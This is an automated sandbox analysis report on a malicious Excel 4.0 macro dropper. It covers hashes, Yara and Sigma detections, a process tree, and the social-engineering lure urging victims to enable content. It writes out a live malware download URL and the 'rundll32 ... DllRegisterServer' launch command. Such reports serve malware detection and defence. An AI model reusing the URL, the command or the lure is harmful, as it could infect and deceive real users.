Loading ...

Play interactive tourEdit tour

Analysis Report document-447482460.xls

Overview

General Information

Sample Name:document-447482460.xls
Analysis ID:433165
MD5:c956ee532ca3530d1f8ffa585e6fe375
SHA1:f99efeea7c2ca81ffbbd59ee904ae81cf44b3493
SHA256:8c00f69352886727d9ad19769e77bcfece11f499fb3da89dfb40396ccb06b330
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Outdated Microsoft Office dropper detected
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Document contains embedded VBA macros
Potential document exploit detected (performs DNS queries)
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 6116 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 6356 cmdline: rundll32 ..\nxckew.wle,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
document-447482460.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0x11d56:$e1: Enable Editing
  • 0x11dcb:$e2: Enable Content
document-447482460.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x134a2:$s1: Excel
  • 0x144fd:$s1: Excel
  • 0x37b4:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
document-447482460.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\nxckew.wle,DllRegisterServer, CommandLine: rundll32 ..\nxckew.wle,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6116, ProcessCommandLine: rundll32 ..\nxckew.wle,DllRegisterServer, ProcessId: 6356

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Antivirus / Scanner detection for submitted sampleShow sources
    Source: document-447482460.xlsAvira: detected
    Antivirus detection for URL or domainShow sources
    Source: http://cyh26wcekai02atpeax.com/fera/frid.gifAvira URL Cloud: Label: malware
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
    Source: global trafficDNS query: name: cyh26wcekai02atpeax.com

    Networking:

    barindex
    Outdated Microsoft Office dropper detectedShow sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDNS query: cyh26wcekai02atpeax.com is down
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDNS query: cyh26wcekai02atpeax.com is down
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDNS query: cyh26wcekai02atpeax.com is down
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDNS query: cyh26wcekai02atpeax.com is down
    Source: unknownDNS traffic detected: query: cyh26wcekai02atpeax.com replaycode: Server failure (2)
    Source: unknownDNS traffic detected: queries for: cyh26wcekai02atpeax.com
    Source: document-447482460.xlsString found in binary or memory: http://cyh26wcekai02atpeax.com/fera/frid.gif
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://api.aadrm.com/
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://api.cortana.ai
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://api.diagnostics.office.com
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://api.office.net
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://api.onedrive.com
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://augloop.office.com
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://augloop.office.com/v2
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://cdn.entity.
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://clients.config.office.net/
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://config.edge.skype.com
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://cortana.ai
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://cortana.ai/api
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://cr.office.com
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://dev.cortana.ai
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://devnull.onenote.com
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://directory.services.
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://graph.ppe.windows.net
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://graph.windows.net
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://graph.windows.net/
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://lifecycle.office.com
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://login.microsoftonline.com/
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://login.windows.local
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://management.azure.com
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://management.azure.com/
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://messaging.office.com/
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://ncus.contentsync.
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://ncus.pagecontentsync.
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://officeapps.live.com
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://onedrive.live.com
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://outlook.office.com/
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://outlook.office365.com/
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://pages.store.office.com/review/query
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://powerlift.acompli.net
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://settings.outlook.com
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://staging.cortana.ai
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://tasks.office.com
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://webshell.suite.office.com
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://wus2.contentsync.
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://wus2.pagecontentsync.
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: B2FA2616-4E04-44C4-B453-68F97B8615EA.1.drString found in binary or memory: https://www.odwebp.svc.ms

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing, pleas- 14 from the yellow bar above ok 15 16 17 ,, , 18" WHY I CANNOT OPEN TH
    Source: Screenshot number: 8Screenshot OCR: Enable Editing" from the yellow bar above @Once You have Enable Editing, please click "Enable Cont
    Source: Screenshot number: 8Screenshot OCR: Enable Content" from the yellow bar above d L) WHY I CANNOT OPEN THIS DOCUMENT? wYou are using i
    Source: Document image extraction number: 1Screenshot OCR: Enable Editing" from the yellow bar above Once You have Enable Editing, please click "Enable Conte
    Source: Document image extraction number: 1Screenshot OCR: Enable Content" from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? You are using iOS or A
    Source: Document image extraction number: 6Screenshot OCR: Enable Editing" from the yellow bar above @Once You have Enable Editing, please click "Enable Cont
    Source: Document image extraction number: 6Screenshot OCR: Enable Content" from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? WYou are using IDS or
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: document-447482460.xlsInitial sample: EXEC
    Source: document-447482460.xlsOLE indicator, VBA macros: true
    Source: document-447482460.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
    Source: document-447482460.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: classification engineClassification label: mal88.troj.expl.evad.winXLS@3/6@4/1
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{615A0FBA-8BA0-4CE1-A1D8-ED3FAC4834E6} - OProcSessId.datJump to behavior
    Source: document-447482460.xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\nxckew.wle,DllRegisterServer
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\nxckew.wle,DllRegisterServer
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\nxckew.wle,DllRegisterServer
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
